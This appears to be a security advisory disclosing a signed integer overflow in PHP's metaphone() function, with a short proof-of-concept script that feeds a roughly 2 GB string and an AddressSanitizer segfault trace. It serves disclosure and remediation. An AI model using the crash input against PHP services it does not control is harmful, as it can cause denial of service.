Researcher: Aleksey Solovev (Positive Technologies)
The PHP standard library provides the function metaphone() (php-src/ext/standard/metaphone.c). This function is used for searching and matching words based on their phonetic sound.
This function declares the variable signed int w_idx, keeping track of the current position into the string passed to metaphone().
|
int w_idx = 0; /* point in the phonization we're at. */ |
The maximum value the signed int type can hold is (usually) 2_147_483_647. In C, exceeding this value for signed types is undefined behavior. Frequently, the value will wrap around and result in the value -2_147_483_648, but this behavior is not guaranteed.
If the string passed to metaphone() has a length of >2_147_483_647, a signed integer overflow can occur, resulting in undefined behavior. Accessing the current word after an overflow can result in a segmentation fault or access unrelated memory.
<?php
ini_set('memory_limit', '-1');
$str = str_repeat('0', 2 * (1024 ** 3) - 2) . 'AE';
metaphone($str, 1);
?>$ ./php cli.php
AddressSanitizer:DEADLYSIGNAL
=================================================================
==2977930==ERROR: AddressSanitizer: SEGV on unknown address 0x74748ba00018 (pc 0x6051a40f8a68 bp 0x7ffca9b12420 sp 0x7ffca9b123d0 T0)
==2977930==The signal is caused by a READ memory access.
#0 0x6051a40f8a68 in metaphone /home/administrator/php/php-src/ext/standard/metaphone.c:192
#1 0x6051a40f8433 in zif_metaphone /home/administrator/php/php-src/ext/standard/metaphone.c:43
#2 0x6051a4552725 in ZEND_DO_ICALL_SPEC_RETVAL_UNUSED_HANDLER /home/administrator/php/php-src/Zend/zend_vm_execute.h:1355
#3 0x6051a46b7f4a in execute_ex /home/administrator/php/php-src/Zend/zend_vm_execute.h:116436
#4 0x6051a46cd123 in zend_execute /home/administrator/php/php-src/Zend/zend_vm_execute.h:121924
#5 0x6051a4831146 in zend_execute_script /home/administrator/php/php-src/Zend/zend.c:1981
#6 0x6051a42653ef in php_execute_script_ex /home/administrator/php/php-src/main/main.c:2645
#7 0x6051a42657ff in php_execute_script /home/administrator/php/php-src/main/main.c:2685
#8 0x6051a4836cb6 in do_cli /home/administrator/php/php-src/sapi/cli/php_cli.c:951
#9 0x6051a4839283 in main /home/administrator/php/php-src/sapi/cli/php_cli.c:1362
#10 0x74758f42a1c9 in __libc_start_call_main ../sysdeps/nptl/libc_start_call_main.h:58
#11 0x74758f42a28a in __libc_start_main_impl ../csu/libc-start.c:360
#12 0x6051a3406d04 in _start (/home/administrator/php/php-src/sapi/cli/php+0x606d04) (BuildId: 675b273c6c01d12f08faaf607fb51c198e4db43b)
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /home/administrator/php/php-src/ext/standard/metaphone.c:192 in metaphone
==2977930==ABORTING
TimWolla Remediation developer
Researcher: Aleksey Solovev (Positive Technologies)
The PHP standard library provides the function
metaphone()(php-src/ext/standard/metaphone.c). This function is used for searching and matching words based on their phonetic sound.This function declares the variable
signed int w_idx, keeping track of the current position into the string passed tometaphone().php-src/ext/standard/metaphone.c
Line 171 in 9498bc3
The maximum value the
signed inttype can hold is (usually)2_147_483_647. In C, exceeding this value for signed types is undefined behavior. Frequently, the value will wrap around and result in the value-2_147_483_648, but this behavior is not guaranteed.If the string passed to
metaphone()has a length of>2_147_483_647, a signed integer overflow can occur, resulting in undefined behavior. Accessing the current word after an overflow can result in a segmentation fault or access unrelated memory.